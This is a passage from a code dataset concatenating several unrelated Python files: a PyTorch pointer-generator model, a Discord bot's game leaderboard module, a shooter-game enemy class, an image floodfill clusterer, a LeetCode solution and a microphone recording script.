use_cuda: return result.cuda()\n else: return result\n\n\n\nclass PGCModel():\n def __init__(self, config, vocab, model_id, model_path, use_cuda):\n self.use_cuda = use_cuda\n self.config = config\n self.vocab = vocab\n self.model_id = model_id\n self.model_path = model_path\n\n self.embedding_size = config['embedding_size']\n self.hidden_size = config['hidden_size']\n self.input_length = config['input_length']\n self.target_length = config['target_length']\n\n self.encoder = EncoderRNN(self.vocab.vocab_size, hidden_size=self.embedding_size)\n self.emb_w = self.encoder.embedding.weight # use weight sharing?\n self.decoder = AttnDecoderRNN(self.hidden_size, self.embedding_size, self.vocab.vocab_size, 1,\n dropout_p=0.1, embedding_weight=None)\n if use_cuda:\n self.encoder.cuda()\n self.decoder.cuda()\n\n self.encoder_optimizer = None\n self.decoder_optimizer = None\n self.criterion = None\n self.logger = None\n print(\"Model compiled\")\n\n\n def train(self, data, val_data, nb_epochs, batch_size, optimizer, lr, tf_ratio, stop_criterion, use_cuda, _print):\n\n if self.logger is None:\n self.encoder_optimizer = optimizer(self.encoder.parameters(), lr= lr, weight_decay=0.0000001)\n self.decoder_optimizer = optimizer(self.decoder.parameters(), lr= lr, weight_decay=0.0000001)\n self.criterion = nn.NLLLoss()\n self.logger = utils.TrainingLogger(nb_epochs, batch_size, len(data))\n print(\"Optimizers compiled\")\n\n for epoch in range(len(self.logger.log), nb_epochs):\n #random.shuffle(data)\n self.logger.init_epoch(epoch)\n for b in range(int(len(data)/batch_size)):\n loss, _time = self.train_batch(samples=data[b*batch_size:(b+1)*batch_size], use_cuda=self.use_cuda)\n self.logger.add_iteration(b+1, loss, _time)\n if b % 200 == 0 and _print:\n print('\\n', [(t[0]['word'], t[0]['p_gen']) for t in self.predict([data[b*batch_size]], 30, False, self.use_cuda)])\n\n for b in range(1345, int(len(val_data)/batch_size)):\n loss, _time = self.train_batch(val_data[b*batch_size:(b+1)*batch_size], self.use_cuda, backprop=False)\n self.logger.add_val_iteration(b+1, loss, _time)\n\n if epoch == 0 or self.logger.log[epoch][\"val_loss\"] < self.logger.log[epoch-1][\"val_loss\"]:\n self.save_model(self.model_path, self.model_id, epoch=epoch, loss=self.logger.log[epoch][\"val_loss\"])\n\n\n def train_batch(self, samples, use_cuda, tf_ratio=0.5, backprop=True):\n start = time.time()\n input_variable, full_input_variable, target_variable, full_target_variable, decoder_input = \\\n utils.get_batch_variables(samples, self.input_length, self.target_length, use_cuda,\n self.vocab.word2index['SOS'])\n\n\n encoder_hidden = self.encoder.init_hidden(len(samples), use_cuda)\n self.encoder_optimizer.zero_grad()\n self.decoder_optimizer.zero_grad()\n loss = 0\n\n encoder_outputs, encoder_hidden = self.encoder(input_variable, encoder_hidden)\n decoder_hidden = torch.cat((encoder_hidden[0], encoder_hidden[1]), -1)\n\n for token_i in range(self.target_length):\n decoder_hidden, p_final, p_gen, p_vocab, attention_dist = \\\n self.decoder(decoder_input, decoder_hidden, encoder_outputs, full_input_variable, use_cuda)\n loss += self.criterion(torch.log(p_final.clamp(min=1e-8)), full_target_variable.narrow(1, token_i, 1).squeeze(-1))\n\n if random.uniform(0, 1) < tf_ratio: decoder_input = target_variable.narrow(1, token_i, 1)\n else:\n _, max_tokens = p_final.max(1)\n for i in range(max_tokens.size()[0]):\n if max_tokens.data[i] >= self.vocab.vocab_size: max_tokens.data[i] = self.vocab.word2index['UNK']\n decoder_input = max_tokens.unsqueeze(1)\n\n if backprop:\n loss.backward()\n self.encoder_optimizer.step()\n self.decoder_optimizer.step()\n\n return loss.data[0] / self.target_length, time.time() - start\n\n\n\n def predict(self, samples, target_length, beam_size, use_cuda): # this only works with one sample at a time\n input_variable, full_input_variable, target_variable, full_target_variable, decoder_input = \\\n utils.get_batch_variables(samples, self.input_length, target_length, use_cuda,\n self.vocab.word2index['SOS'])\n encoder_hidden = self.encoder.init_hidden(len(samples), use_cuda)\n\n encoder_outputs, encoder_hidden = self.encoder(input_variable, encoder_hidden)\n decoder_hidden = torch.cat((encoder_hidden[0], encoder_hidden[1]), -1)\n\n if not beam_size:\n result = []\n for token_i in range(target_length):\n\n decoder_hidden, p_final, p_gen, p_vocab, attention_dist = \\\n self.decoder(decoder_input, decoder_hidden, encoder_outputs, full_input_variable, use_cuda)\n\n\n p_vocab_word, vocab_word_idx = p_final.max(1)\n result.append([{'token_idx': vocab_word_idx.data[i],\n 'word': utils.translate_word(vocab_word_idx.data[i], samples[i], self.vocab),\n 'p_gen': round(p_gen.data[i][0], 3)}\n for i in range(len(samples))])\n _, max_tokens = p_final.max(1)\n for i in range(max_tokens.size()[0]):\n if max_tokens.data[i] >= self.vocab.vocab_size: max_tokens.data[i] = self.vocab.word2index['UNK']\n decoder_input = max_tokens.unsqueeze(1)\n return result\n\n else:\n search_complete = False\n top_beams = [Beam(decoder_input, decoder_hidden, [], [])]\n\n while not search_complete:\n new_beams = []\n for beam in top_beams:\n if not beam.complete:\n decoder_hidden, p_final, p_gen, p_vocab, attention_dist = \\\n self.decoder(beam.decoder_input, beam.decoder_hidden, encoder_outputs, full_input_variable, use_cuda)\n for k in range(beam_size):\n p_vocab_word, vocab_word_idx = p_final.max(1)\n _, max_tokens = p_final.max(1)\n if max_tokens.data[0] >= self.vocab.vocab_size: max_tokens.data[0] = self.vocab.word2index['UNK']\n new_beams.append(Beam(max_tokens.unsqueeze(1), decoder_hidden,\n beam.log_probs+[p_vocab_word.data[0]],\n beam.sequence + [vocab_word_idx.data[0]]))\n p_final[0, vocab_word_idx.data[0]] = 0\n\n if len(new_beams[-1].sequence) == target_length or vocab_word_idx.data[0] == self.vocab.word2index['EOS']:\n #print(vocab_word_idx.data[0], self.vocab.word2index['EOS'])\n new_beams[-1].complete = True\n\n all_beams = sorted([(b, b.compute_score()) for b in new_beams], key=lambda tup: tup[1])\n if len(all_beams) > beam_size: all_beams = all_beams[:beam_size]\n top_beams = [beam[0] for beam in all_beams]\n\n if len([True for b in top_beams if b.complete]) == beam_size: search_complete = True\n\n return [[\" \".join([utils.translate_word(t, samples[0], self.vocab) for t in b.sequence]),\n b.compute_score()]\n for b in top_beams]\n\n def save_model(self, path, id, epoch, loss):\n data = {\n 'epoch': epoch + 1,\n 'best_prec1': loss,\n 'vocab': self.vocab,\n 'config': self.config,\n 'logger': self.logger,\n 'encoder': self.encoder.state_dict(), 'decoder': self.decoder.state_dict(),\n 'encoder_optm': self.encoder_optimizer.state_dict(),'decoder_optm': self.decoder_optimizer.state_dict()\n }\n filename= path + \"checkpoint_\" + id + \"_ep@\" +\".pickle\"\n torch.save(data, filename)\n\n def load_model(self, file_path, file_name):\n data = torch.load(file_path + file_name)\n self.encoder.load_state_dict(data['encoder'])\n self.decoder.load_state_dict(data['decoder'])\n self.vocab = data['vocab']\n\n\nimport math\n\nclass Beam():\n def __init__(self, decoder_input, decoder_hidden, log_probs, sequence):\n self.decoder_input = decoder_input\n self.decoder_hidden = decoder_hidden\n self.log_probs = log_probs\n self.sequence = sequence\n self.complete = False\n\n def compute_score(self):\n score = 1\n for p in [-math.log(log_prob) for log_prob in self.log_probs]:\n score *= p\n return score\n\n\n","sub_path":"PGC/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":13363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"88801518","text":"# Copyright: see copyright.txt\n\nimport sys\nimport traceback\nimport logging\nlog = logging.getLogger(\"se.utils\")\n\ndef _traceback():\n\tstack = traceback.format_stack()\n\treturn stack[:-2]\n\ndef crash(msg):\n\tstack = _traceback()\n\tprint(\"\\n\"+\"\".join(stack))\n\tprint(msg)\n\tsys.exit(-1)\n\ndef serialize_dict(d):\n\tnd = {}\n\tkeys = d.keys()\n\tkeys.sort()\n\tfor k in keys:\n\t\tif isinstance(d[k], dict):\n\t\t\tnd[k] = serialize_dict(d[k])\n\t\telif hasattr(d[k], \"__getstate__\"):\n\t\t\tnd[k] = d[k].__getstate__()\n\t\telse:\n\t\t\tnd[k] = d[k]\n\treturn nd\n\ndef flatten_dict(d):\n\tkeys = d.keys()\n\tkeys.sort()\n\tflat_attrs = map(lambda x: (x, d[x]), keys)\n\treturn [item for subtuple in flat_attrs for item in subtuple] # Flatten the list of tuples\n\ndef serialize_list_of_dicts(l):\n\tnl = []\n\tfor d in l:\n\t\tnd = serialize_dict(d)\n\t\tnl.append(nd)\n\tnl.sort(key=flatten_dict)\n\treturn nl\n\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"378576160","text":"import os\nimport inspect\nimport sys\n\ncurrentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nparentdir = os.path.dirname(currentdir)\nsys.path.insert(0, parentdir)\n\n\nclass Position:\n def __init__(self, **kargs):\n self.deal_id = kargs[\"deal_id\"]\n self.size = kargs[\"size\"]\n self.create_date = kargs[\"create_date\"]\n self.direction = kargs[\"direction\"]\n self.level = kargs[\"level\"]\n self.limit = kargs[\"limit\"]\n self.stop = kargs[\"stop\"]\n self.currency = kargs[\"currency\"]\n self.epic = kargs[\"epic\"]\n self.market_id = kargs[\"market_id\"]\n","sub_path":"src/Interfaces/Position.py","file_name":"Position.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"217106870","text":"import calendar\nfrom datetime import datetime\nfrom typing import List, Tuple, Union\n\nfrom discord import Colour, Embed\nfrom discord.ext.commands import Context\nfrom discord.utils import escape_markdown\n\nimport emojis\nimport pss_assert\nimport pss_core as core\nimport pss_entity as entity\nfrom pss_exception import Error\nimport pss_fleet as fleet\nimport pss_login as login\nimport pss_lookups as lookups\nimport pss_sprites as sprites\nimport pss_tournament as tourney\nimport pss_user as user\nimport settings\nfrom typehints import EntitiesData, EntityInfo\nimport utils\n\n\n# ---------- Constants ----------\n\nALLOWED_DIVISION_LETTERS: List[str] = sorted([letter for letter in lookups.DIVISION_CHAR_TO_DESIGN_ID.keys() if letter != '-'])\n\nDIVISION_DESIGN_BASE_PATH: str = 'DivisionService/ListAllDivisionDesigns2'\nDIVISION_DESIGN_DESCRIPTION_PROPERTY_NAME: str = 'DivisionName'\nDIVISION_DESIGN_KEY_NAME: str = 'DivisionDesignId'\n\nSTARS_BASE_PATH: str = 'AllianceService/ListAlliancesWithDivision'\n\nTOP_FLEETS_BASE_PATH: str = 'AllianceService/ListAlliancesByRanking?skip=0&take='\n\n\n\n\n\n# ---------- Top fleets info ----------\n\nasync def get_top_fleets(ctx: Context, take: int = 100, as_embed: bool = settings.USE_EMBEDS) -> Union[List[Embed], List[str]]:\n tourney_running = tourney.is_tourney_running()\n divisions_designs_data = await divisions_designs_retriever.get_data_dict3()\n fleets_divisions_max_ranks = [int(fleet_division_design_info['MaxRank']) for fleet_division_design_info in __get_fleet_division_designs(divisions_designs_data).values()]\n raw_data = await core.get_data_from_path(TOP_FLEETS_BASE_PATH + str(take))\n data = utils.convert.xmltree_to_dict3(raw_data)\n if data:\n title = f'Top {take} fleets'\n prepared_data = __prepare_top_fleets(data)\n body_lines = __create_body_lines_top_fleets(prepared_data, tourney_running, fleets_divisions_max_ranks)\n\n if as_embed:\n colour = utils.discord.get_bot_member_colour(ctx.bot, ctx.guild)\n return __create_top_embeds(title, body_lines, colour)\n else:\n result = [f'**{title}**']\n result.extend(body_lines)\n return result\n else:\n raise Error(f'An unknown error occured while retrieving the top fleets. Please contact the bot\\'s author!')\n\n\ndef __create_body_lines_top_fleets(prepared_data: List[Tuple[int, str, str, str]], tourney_running: bool, fleets_divisions_max_ranks: List[int]) -> List[str]:\n if tourney_running:\n result = [\n f'**{position}.** {fleet_name} ({trophies} {emojis.trophy} - {stars} {emojis.star})'\n for position, fleet_name, trophies, stars\n in prepared_data\n ]\n else:\n result = [\n f'**{position}.** {fleet_name} ({trophies} {emojis.trophy})'\n for position, fleet_name, trophies, _\n in prepared_data\n ]\n for rank in sorted(fleets_divisions_max_ranks, reverse=True):\n if rank < len(result):\n result.insert(rank, utils.discord.ZERO_WIDTH_SPACE)\n return result\n\n\ndef __prepare_top_fleets(fleets_data: EntitiesData) -> List[Tuple]:\n result = [\n (\n position,\n escape_markdown(fleet_info[fleet.FLEET_DESCRIPTION_PROPERTY_NAME]),\n fleet_info['Trophy'],\n fleet_info['Score']\n ) for position, fleet_info in enumerate(fleets_data.values(), start=1)\n ]\n return result\n\n\n\n\n\n# ---------- Top captains info ----------\n\nasync def get_top_captains(ctx: Context, take: int = 100, as_embed: bool = settings.USE_EMBEDS) -> Union[List[Embed], List[str]]:\n skip = 0\n data = await __get_top_captains_data(skip, take)\n\n if data:\n title = f'Top {take} captains'\n prepared_data = __prepare_top_captains(data, skip, take)\n body_lines = __create_body_lines_top_captains(prepared_data)\n if as_embed:\n colour = utils.discord.get_bot_member_colour(ctx.bot, ctx.guild)\n result = __create_top_embeds(title, body_lines, colour)\n else:\n result = [f'**{title}**']\n result.extend(body_lines)\n return result\n else:\n raise Error(f'An unknown error occured while retrieving the top captains. Please contact the bot\\'s author!')\n\n\ndef __create_body_lines_top_captains(prepared_data: List[Tuple[int, str, str, str]]) -> List[str]:\n result = [\n f'**{position}.** {user_name} ({fleet_name}) - {trophies} {emojis.trophy}'\n for position, user_name, fleet_name, trophies\n in prepared_data\n ]\n return result\n\n\nasync def __get_top_captains_data(skip: int, take: int) -> EntitiesData:\n path = await __get_top_captains_path(skip, take)\n raw_data = await core.get_data_from_path(path)\n data = utils.convert.xmltree_to_dict3(raw_data)\n return data\n\n\nasync def __get_top_captains_path(skip: int, take: int) -> str:\n skip += 1\n access_token = await login.DEVICES.get_access_token()\n result = f'LadderService/ListUsersByRanking?accessToken={access_token}&from={skip}&to={take}'\n return result\n\n\ndef __prepare_top_captains(users_data: EntitiesData, skip: int, take: int) -> List[Tuple]:\n start = skip + 1\n end = skip + take\n result = [\n (\n position,\n escape_markdown(user_info[user.USER_DESCRIPTION_PROPERTY_NAME]),\n escape_markdown(user_info[fleet.FLEET_DESCRIPTION_PROPERTY_NAME]),\n user_info['Trophy']\n )\n for position, user_info\n in enumerate(users_data.values(), start=start)\n if position >= start and position <= end\n ]\n return result\n\n\n\n\n\n# ---------- Stars info ----------\n\nasync def get_division_stars(ctx: Context, division: str = None, fleet_data: dict = None, retrieved_date: datetime = None, as_embed: bool = settings.USE_EMBEDS) -> Union[List[Embed], List[str]]:\n if division:\n pss_assert.valid_parameter_value(division, 'division', min_length=1, allowed_values=ALLOWED_DIVISION_LETTERS)\n if division == '-':\n division = None\n else:\n division = None\n\n if fleet_data is None or retrieved_date is None:\n data = await core.get_data_from_path(STARS_BASE_PATH)\n fleet_infos = utils.convert.xmltree_to_dict3(data)\n else:\n fleet_infos = fleet_data\n\n divisions_designs_infos = await divisions_designs_retriever.get_data_dict3()\n\n divisions = {}\n if division:\n division_design_id = lookups.DIVISION_CHAR_TO_DESIGN_ID[division.upper()]\n divisions[division_design_id] = [fleet_info for fleet_info in fleet_infos.values() if fleet_info[DIVISION_DESIGN_KEY_NAME] == division_design_id]\n else:\n for division_design_id in lookups.DIVISION_DESIGN_ID_TO_CHAR.keys():\n if division_design_id != '0':\n divisions[division_design_id] = [fleet_info for fleet_info in fleet_infos.values() if fleet_info[DIVISION_DESIGN_KEY_NAME] == division_design_id]\n\n if divisions:\n divisions_texts = []\n for division_design_id, fleet_infos in divisions.items():\n divisions_texts.append((division_design_id, __get_division_stars_as_text(fleet_infos)))\n\n result = []\n footer = utils.datetime.get_historic_data_note(retrieved_date)\n colour = utils.discord.get_bot_member_colour(ctx.bot, ctx.guild)\n for division_design_id, division_text in divisions_texts:\n if as_embed:\n division_title = __get_division_title(division_design_id, divisions_designs_infos, False, retrieved_date)\n thumbnail_url = await sprites.get_download_sprite_link(divisions_designs_infos[division_design_id]['BackgroundSpriteId'])\n embed_bodies = utils.discord.create_posts_from_lines(division_text, utils.discord.MAXIMUM_CHARACTERS_EMBED_DESCRIPTION)\n for i, embed_body in enumerate(embed_bodies):\n thumbnail_url = thumbnail_url if i == 0 else None\n embed = utils.discord.create_embed(division_title, description=embed_body, footer=footer, thumbnail_url=thumbnail_url, colour=colour)\n result.append(embed)\n else:\n division_title = __get_division_title(division_design_id, divisions_designs_infos, True, retrieved_date)\n result.append(division_title)\n result.extend(division_text)\n result.append(utils.discord.ZERO_WIDTH_SPACE)\n\n if not as_embed:\n result = result[:-1]\n if footer:\n result.append(f'```{footer}```')\n\n return result\n else:\n raise Error(f'An unknown error occured while retrieving division info. Please contact the bot\\'s author!')\n\n\ndef __get_division_stars_as_text(fleet_infos: List[EntityInfo]) -> List[str]:\n lines = []\n fleet_infos = entity.sort_entities_by(fleet_infos, [('Score', int, True)])\n fleet_infos_count = len(fleet_infos)\n for i, fleet_info in enumerate(fleet_infos, start=1):\n fleet_name = escape_markdown(fleet_info['AllianceName'])\n additional_info: List[Tuple[str, str]] = []\n trophies = fleet_info.get('Trophy')\n if trophies:\n additional_info.append((trophies, emojis.trophy))\n member_count = fleet_info.get('NumberOfMembers')\n if member_count:\n additional_info.append((str(member_count), emojis.members))\n stars = fleet_info['Score']\n if i < fleet_infos_count:\n difference = int(stars) - int(fleet_infos[i]['Score'])\n else:\n difference = 0\n if additional_info:\n additional_str = f' ({\" \".join([\" \".join(info) for info in additional_info])})'\n else:\n additional_str = ''\n lines.append(f'**{i:d}.** {stars} (+{difference}) {emojis.star} {fleet_name}{additional_str}')\n return lines\n\n\ndef __get_division_title(division_design_id: str, divisions_designs_infos: EntitiesData, include_markdown: bool, retrieved_date: datetime) -> str:\n title = divisions_designs_infos[division_design_id][DIVISION_DESIGN_DESCRIPTION_PROPERTY_NAME]\n if retrieved_date:\n title = f'{title} - {calendar.month_abbr[retrieved_date.month]} {retrieved_date.year}'\n if include_markdown:\n return f'__**{title}**__'\n else:\n return title\n\n\n\n\n\n# ---------- Helper functions ----------\n\ndef is_valid_division_letter(div_letter: str) -> bool:\n if div_letter is None:\n result = True\n else:\n result = div_letter.lower() in [letter.lower() for letter in ALLOWED_DIVISION_LETTERS]\n return result\n\n\ndef __create_top_embeds(title: str, body_lines: List[str], colour: Colour) -> List[Embed]:\n bodies = utils.discord.create_posts_from_lines(body_lines, utils.discord.MAXIMUM_CHARACTERS_EMBED_DESCRIPTION)\n result = []\n for body in bodies:\n result.append(utils.discord.create_embed(title, description=body, colour=colour))\n return result\n\n\ndef __get_fleet_division_designs(divisions_designs_data: EntitiesData) -> EntitiesData:\n result = {key: value for key, value in divisions_designs_data.items() if value.get('DivisionType') == 'Fleet'}\n return result\n\n\n\n\n\n# ---------- Initilization ----------\n\ndivisions_designs_retriever: entity.EntityRetriever = entity.EntityRetriever(\n DIVISION_DESIGN_BASE_PATH,\n DIVISION_DESIGN_KEY_NAME,\n DIVISION_DESIGN_DESCRIPTION_PROPERTY_NAME,\n cache_name='DivisionDesigns'\n)","sub_path":"src/pss_top.py","file_name":"pss_top.py","file_ext":"py","file_size_in_byte":11409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"119113935","text":"'''\nCreated on 2011/11/10\n\n@author: t\n'''\n\nimport Std\nimport STG.Ctrl as Ctrl\nimport STG.Auxs as Auxs\nfrom STG.Enemy.BaseEnemy import Base\nimport Util.Misc as Misc\nfrom Util.Coroutine import Coroutine\nfrom Util.Coroutine import createWait\nimport Util.NWay as NWay\n\nfrom STG.Regulation.Hidamari.Regular.Stage1.Idiot import Mikan as Regulation\n\nclass Mikan(Base):\n\tSIZE = Std.Vector2DF(128, 100)/3 * 2\n\tMAX_HP = Regulation.hp\n\t\n\tdef __init__(self, resource, scoreManager, pos, speed):\n\t\tsuper().__init__(\n\t\t\tStd.Hit.RectI(pos, self.SIZE, True), self.MAX_HP)\n\t\tself.scoreManager = scoreManager\n\t\tself.task = Coroutine(self._task)\n\t\t\n\t\tself.locator = Std.Locator.LinearF(pos)\n\t\tself.locator.speed.setUnitVector(90)\n\t\tself.locator.speed *= speed\n\t\t\n\t\tself.drawParam = Std.Sprite.DrawParam()\n\t\tself.drawParam.texture = resource.st1_Mikan\n\t\tself.drawParam.src = Std.RectF(0, 0, 128, 100)\n\t\tself.drawParam.dst = pos.makeRect(self.SIZE, True)\n\t\tself.drawParam.priority = Ctrl.DrawPriority.enemy\n\t\t\n\t\tself.se_Explode = resource.se_Explode1\n\t\n\t@property\n\tdef position(self):\n\t\treturn self.locator.position\n\tdef applyExternalForce(self, vec):\n\t\treturn self.locator.applyExternalForce(vec)\n\t\n\t@property\n\tdef speed(self):\n\t\treturn self.locator.speed.getAbs()\n\t@speed.setter\n\tdef speed(self, value):\n\t\tself.locator.speed.normalize()\n\t\tself.locator.speed *= value\n\t\n\tdef onUpdate(self):\n\t\tself.locator.update()\n\t\tif self.task.alive:\n\t\t\tself.task.resume()\n\t\t\n\t\tself.drawParam.dst = self.position.makeRect(self.SIZE, True)\n\tdef _task(self):\n\t\tdef getLaunchPos():\n\t\t\tpos = self.position\n\t\t\treturn Std.Vector2DF(pos.x, pos.y + self.SIZE.y / 3)\n\t\tvalidAreaRect = Std.Hit.RectI(\n\t\t\t0, \n\t\t\t0, \n\t\t\tStd.Consts.ScreenSize.x - Std.Consts.StgInfAreaSize.x, \n\t\t\tStd.Consts.ScreenSize.y, \n\t\t\tFalse)\n\t\t\n\t\twhile True:\n\t\t\twait = createWait(Regulation.waitFrameNum)\n\t\t\twhile wait(): yield\n\t\t\t\n\t\t\tdrawParam = Auxs.createBulletRedDrawParam(\n\t\t\t\tgetLaunchPos(), Std.Vector2DF(10, 10))\n\t\t\tangle = self.position.getAngle(Ctrl.Actor.myShip.position)\n\t\t\tinterval = Regulation.interval\n\t\t\tnum = Regulation.wayNum\n\t\t\tradius = int(drawParam.dst.w/2)\n\t\t\tfor _ in range(Regulation.launchNum):\n\t\t\t\tpos = getLaunchPos()\n\t\t\t\tNWay.launchLinear(pos, angle, interval, num, radius, drawParam)\n\t\t\t\tlaunchInterval = createWait(Regulation.launchInterval)\n\t\t\t\twhile launchInterval(): yield\n\t\t\t\n\t\t\tif not validAreaRect.isHit(self.hitRect):\n\t\t\t\tbreak\n\tdef onDraw(self):\n\t\tStd.Sprite.draw(self.drawParam)\n\t\n\tdef onErase(self):\n\t\tMisc.createExplosion(\n\t\t\tCtrl.DrawPriority.enemy, \n\t\t\t5, \n\t\t\tself.locator.position, \n\t\t\t200, \n\t\t\t1, \n\t\t\tStd.Vector2DF(48, 48)\n\t\t\t)\n\t\tself.se_Explode.play()\n\tdef onDestructed(self):\n\t\tself.onErase()\n\t\tself.scoreManager.addScore(self.maxHp)\n\t\t\n\t\titemNum = Regulation.itemNum\n\t\tangleList = NWay.getAngleList(\n\t\t\tRegulation.itemLaunchAngle, Regulation.itemLaunchAngleInterval, itemNum)\n\t\tdef effectCallback(result):\n\t\t\tif not result:\n\t\t\t\tself.scoreManager.addScore(1000)\n\t\tfor angle in angleList:\n\t\t\titem = Auxs.Item.PowerUp(self.position, angle)\n\t\t\titem.setEffectCallback(effectCallback)\n\t\t\tCtrl.Actor.registerItem(item)\n\tdef onDamaged(self, damage):\n\t\tself.scoreManager.addRate(damage * 0.01)\n\tdef onDestructedByDamage(self, damage):\n\t\tself.onDestructed()","sub_path":"Script/Python/src/STG/Stage/Hidamari/Regular/Stage1/Enemy/Mikan.py","file_name":"Mikan.py","file_ext":"py","file_size_in_byte":3222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"379782100","text":"import sys\n\n\ndef adder(integers):\n for i in integers:\n if not i.isdigit():\n return ValueError(f'input {repr(i)} is not an integer!')\n return sum(map(int, integers))\n\n\ndef main():\n print(adder(sys.argv[1:]))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"int_addr/int_adder.py","file_name":"int_adder.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"292465719","text":"class Solution:\n def subdomainVisits(self, cpdomains: List[str]) -> List[str]:\n # Count domains\n from collections import defaultdict\n counter = defaultdict(int)\n for string in cpdomains:\n count, domains = string.split(' ')\n domains = domains.split('.')\n count = int(count)\n for i in range(len(domains)):\n domain = '.'.join(domains[-i:])\n counter[domain] += count\n\n # Output results\n output = []\n for domain, val in counter.items():\n output.append(f'{val} {domain}')\n return output\n","sub_path":"leetcode/lc811_Subdomain_Visit_Count.py","file_name":"lc811_Subdomain_Visit_Count.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"585799449","text":"import numpy as np\n\n# -------- Test picture --------------\nimport cv2\nimport imageio as imio\nimport pylab\nimport matplotlib\nfrom matplotlib import pyplot as plt\n\nimgA = imio.imread(\"./testbilder/blob5.png\")\nimgA = imgA[:,:,0]\nfull_image = (imgA>200)*1\nfull_image_dim = full_image.shape\n\n#print(\"image dim:\",full_image_dim)\n#print(\"Full: \",full_image)\n\n\ndef floodFill(x,y,cluster_id):\n\n #print(\"floodfill\", x,y,full_image[x,y])\n if full_image[x,y]==1:\n toFill = set()\n toFill.add((x,y))\n while len(toFill)!=0:\n (xi,yi) = toFill.pop()\n full_image[xi,yi] = cluster_id # Fill\n\n for xii in [-1,0,1]:\n for yii in [-1,0,1]:\n if not (xii==0 and yii==0):\n cx = xi + xii\n cy = yi + yii\n\n in_bound = cx>=0 and cx<=full_image_dim[0]-1 and\\\n cy>=0 and cy<=full_image_dim[1]-1\n\n if in_bound:\n if full_image[cx,cy]==1:\n toFill.add((cx,cy))\n return(1)\n else:\n return(0)\n\n\"\"\"\nxi=1\nyi=1\nwhile xi < sub_matrices_dim[0]:\n while yi < sub_matrices_dim[1]:\n cluster_id+=floodFill(xi,yi,cluster_id)\n if xi+3 < sub_matrices_dim[0]:\n xi = xi+3\n else:\n xi = sub_matrices_dim[0]-2\n if yi+3 < sub_matrices_dim[1]:\n yi = yi+3\n else:\n yi = sub_matrices_dim[1]-2\n\"\"\"\n\ncluster_id=2\nfor xi in range(1,full_image_dim[0],2):\n for yi in range(1,full_image_dim[1],2):\n cluster_id+=floodFill(xi,yi,cluster_id)\n\nprint(\"cluster: \",cluster_id, cluster_id-2)\n\n\ncluster_areas=[]\ncluster_x=[]\ncluster_y=[]\n\ncluster_coordinates = [[],[]]\n\nnbr_clusters = cluster_id-2\n\n# ---- Cluster areas and mass center ----\ncoordinates = np.mgrid[0:full_image_dim[0],0:full_image_dim[1]]\n #(rows/cols,x,y)\n\nif nbr_clusters>0:\n for cluster in range(0,nbr_clusters):\n current_cluster = full_image==2+cluster\n\n c_a=np.sum(current_cluster)\n cluster_areas.append(c_a)\n\n #print(c_a)\n #print(\"hmmm:\\n\",np.multiply(coordinates[0,:,:],current_cluster))\n #print(\"hmmm:\\n\",np.multiply(coordinates[1,:,:],current_cluster))\n\n c_x = round(np.sum(np.multiply(coordinates[0,:,:],current_cluster))/c_a)\n c_y = round(np.sum(np.multiply(coordinates[1,:,:],current_cluster))/c_a)\n cluster_x.append(int(c_x))\n cluster_y.append(int(c_y))\n\n cluster_coordinates[0].append(int(c_x))\n cluster_coordinates[1].append(int(c_y))\n\nprint(cluster_areas)\nprint(cluster_x)\nprint(cluster_y)\n\nprint(cluster_coordinates)\n","sub_path":"floodF.py","file_name":"floodF.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"606113258","text":"#Commented file , to get audio\nimport os\nimport argparse \n\nimport numpy as np\nfrom scipy.io import wavfile \nfrom hmmlearn import hmm\nfrom python_speech_features import mfcc\nfrom joblib import dump,load \n\nimport sounddevice as sd\nimport librosa\nimport queue\nimport matplotlib.pyplot as plt\nimport librosa.display\nimport soundfile as sf\nimport HMM\n\n\n#AUDIO_DEVICE='Microphone (Realtek(R) Audio), MME'\nAUDIO_DEVICE='Microphone (Realtek(R) Audio), Windows DirectSound'\nSAMPLING_RATE = 8000\n#default block size is 2048\n#BLOCK_SIZE=2048 #if is too small it print 0\naudio_queue = queue.Queue()\n#output_audio_folder=\"./CoughSpeechWenRei/cough/\"\n\ndef capture_audio(block, block_len, time, status):\n\n audio_queue.put(block.copy())\n #print(block_len)\n\n# Function to parse input arguments\ndef build_arg_parser():\n #./name/Cough/\n parser = argparse.ArgumentParser(description='Create Audio Folder')\n parser.add_argument(\"-d\", \"--audio-dir\", dest=\"output_audio_folder\",required=True,\n help=\"Audio Foldername\")\n parser.add_argument(\"-i\",\"--iteration\",dest=\"iteration\",default=15,help=\"Number of Audios\")\n return parser\n\n\nif __name__=='__main__':\n args = build_arg_parser().parse_args()\n output_audio_folder = args.output_audio_folder\n if output_audio_folder[:-1]!='/':\n output_audio_folder=output_audio_folder+\"/\"\n if os.path.isdir(output_audio_folder)==False:\n os.makedirs(output_audio_folder)\n iteration=args.iteration\n #hmm_models_load=load('hmmaudio.joblib')\n\n input_files=[]\n audio=np.array([])\n print(\"start\")\n for a in range(int(iteration)):\n #printing to buffer will cause signal distortion, so don't print \n #filename=input(\"Filename?\")\n filename=output_audio_folder+str(a)+\".wav\"\n if os.path.isfile(filename)==True:\n os.remove(filename)\n with sf.SoundFile(filename, mode='x', samplerate=SAMPLING_RATE,\n channels=1) as file:\n count=0\n #print(\"Start\") \n #channel must be 2 to comply with wav file \n with sd.InputStream(device=AUDIO_DEVICE, channels=1, callback=capture_audio,\n samplerate=SAMPLING_RATE):\n \n\n while count<20:#20 1.15second #200 is 5 seconds \n a=audio_queue.get()\n if len(audio) == 0:\n audio = a\n 